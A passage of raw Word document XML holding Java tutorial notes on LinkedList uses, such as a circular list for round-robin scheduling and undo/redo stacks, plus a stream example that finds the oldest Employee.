    <w:p w14:paraId="6B572C00" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Circular Linked List for Round Robin Scheduling</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A3FF516"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Node {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52AA14D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data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61EEAA16"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Node next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C00055B" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="47DA351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Node(int data) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1933CD0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data = data;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734D9AA6"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332BDFB"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CAEFA68" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FC958C6"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CircularLinkedListExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A5F917A"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5F5CBE60"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Node head = new Node(1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0400468A"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head.next = new Node(2);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="199ED18F"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head.next.next = new Node(3);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CDA21FA"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head.next.next.next = new Node(4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57567B84"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head.next.next.next.next = head;  // Circular link</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BCD4EFF"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E5C5085"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nt the circular linked list (will print indefinitely if not controlled)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3689EDE3"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Node current = head;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6477E2C6"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or (int i = 0; i &lt; 10; i++) {  // Only 10 iterations to avoid infinite loop</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6643A071"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urrent.data);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B6EF913"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urrent = current.next;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B562890"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35F1446"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19993ED"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BCCC469" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Implementing Undo/Redo Functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5997DDC3"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applications like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>text editors</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graphical design tool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gaming</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, undo and redo features can be implemented using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Each action (like a drawing operation or text entry) is saved as a node in the list, and moving backward or forward through the list allows you to undo or redo operations.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32237814" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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Undo/Redo using LinkedList (simplified)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15C262DF"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nkedList;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D57C30D" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0AE2B2DA"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UndoRedoExample {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35F4029A"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public static void main(String[] args) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D14AAA1"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nkedList&lt;String&gt; undoStack = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CE2D6C7"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nkedList&lt;String&gt; redoStack = new LinkedList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35566689"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EA8723B"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dding actions to the undo stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F3320D2"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undoStack.push("Action1");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="577ED488"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undoStack.push("Action2");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37AC40BF"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undoStack.push("Action3");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="663CA2F8" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3F44FE27"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ndo an action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54D6F3E3"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undoneAction = undoStack.pop();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55571D83"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doStack.push(undoneAction);  // Save undone action to redo stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A140076" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3C62687D"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Redo an action</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="264F510A"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redoneAction = redoStack.pop();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4BE4A700"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undoStack.push(redoneAction);  // Restore redone action to undo stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE797F3" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="58BCFCCC"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nt current stack</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="653B0ECD"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Undo Stack: " + undoStack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25B3AF82"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Redo Stack: " + redoStack);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7960CA51"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13E7931"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4BC18B5" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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7. Implementing Custom Data Structures</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F0C8B4E"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you're building a custom data structure like a </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>deque (double-ended queue)</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priority queue</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, a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can be a suitable underlying data structure because it supports fast insertions and deletions at both ends.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F4907F9" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="00D60CE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B953B8F">
          <v:rect id="_x0000_i1494" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FC3D717" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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 of Practical Use Cases:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="071F5C1C" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Queue and Stack Implementations</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="591D4DFA" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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oubly Linked Lists</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (bi-directional traversal)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54454550" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ndo/Redo Functionality</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0080F192" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ircular Linked Lists</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for round-robin scheduling or buffering</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6DC029E8" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Efficient Structures</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for dynamic and fluctuating data sizes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00148825" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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ustom Data Structures</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (e.g., deque or priority queue)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EB7B0CF" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE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hen to Use LinkedList:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5806C5F9" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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need fast insertions and deletions at the beginning or middle of the list.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="16E5C198" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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the number of elements in the list is unknown or frequently changes.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0740996C" w14:textId="77777777" w:rsidR="004B6BBD" w:rsidRPr="00CE4B95" w:rsidRDefault="004B6BBD" w:rsidP="00D60CE8">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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need to implement queues, stacks, or circular structures.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AFF05D4" w14:textId="5499D227"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E87A38B">
          <v:rect id="_x0000_i1495" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D4C4F4" w14:textId="77777777" w:rsidR="00E67980" w:rsidRPr="00CE4B95" w:rsidRDefault="00E67980">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="151" w:name="_Toc196307631"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Compare ArrayList objects from the employee and return the highest employee age?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="151"/>
    </w:p>
    <w:p w14:paraId="13997FB6" w14:textId="79E3DBE6" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">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o compare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of </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> objects and return the highest employee age, you can follow these steps:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C5164E" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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fine the Employee class with necessary fields (like name, age, etc.).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF54FC1" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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 the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stream()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> API to process the list of employees.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27017968" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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 the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>max()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> function with a custom comparator to find the employee with the highest age.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E9B5089" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E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Code:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="276D9C18"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List;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="330A162B"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Comparator;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2501341C" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3A38CA66"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Employee {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FB975AF"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ring name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E4911D"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int age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739FFDDE" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="5BDB230F"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onstructor</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00DCE892"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Employee(String name, int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35D2CEA7"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name = name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734EBD8C"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this.age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2ECAAA35"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FF080F5" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="388FF858"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Getter for age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06370A6F"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int getAge() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0897FC39"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age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B3DD84"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445DD62" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="574AB691"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etter for age (optional)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="684ABAD4"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setAge(int age) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15EE5546"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age = age;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="734A1460"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BFC9EAF" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="25608A80"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03AE0BC6"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ring toString() {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4706520B"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Employee{name='" + name + "', age=" + age + "}";</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="588642CA"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1BD3492"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296A22D" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="27D869B9"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345C9BB9"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5FCEE6EA"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ing ArrayList of Employee objects</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F7D8FA1"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rrayList&lt;Employee&gt; employees = new ArrayList&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EFBC731"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mployees.add(new Employee("John", 25));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C156305"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mployees.add(new Employee("Alice", 30));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B845D7B"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mployees.add(new Employee("Bob", 35));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10030709"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mployees.add(new Employee("Charlie", 40));</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F31A575"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EA55465"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Finding the employee with the highest age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77A366D4"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mployee oldestEmployee = employees.stream()</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52ACBF70"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x(Comparator.comparingInt(Employee::getAge))</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4838FF3B"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rElse(null); // In case the list is empty, return null</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA46894" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="374CD00E"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Output the employee with the highest age</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18D67E35"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oldestEmployee != null) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B477EA"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The oldest employee is: " + oldestEmployee);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="616942D8"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else {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E36359B"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No employees found.");</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20B34CAF"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9919318"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0C4B812"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5D62E6F" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54C00C06" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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Employee</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> class has a name and age field with a constructor, getter for age, and a toString() method for easy output.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="669A3442" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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employees</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> list is populated with a few Employee objects.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="44D3A3B0" w14:textId="77777777" w:rsidR="0063317D" w:rsidRPr="00CE4B95" w:rsidRDefault="0063317D" w:rsidP="002A38E1">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="7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e use the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>stream()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> API along with </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
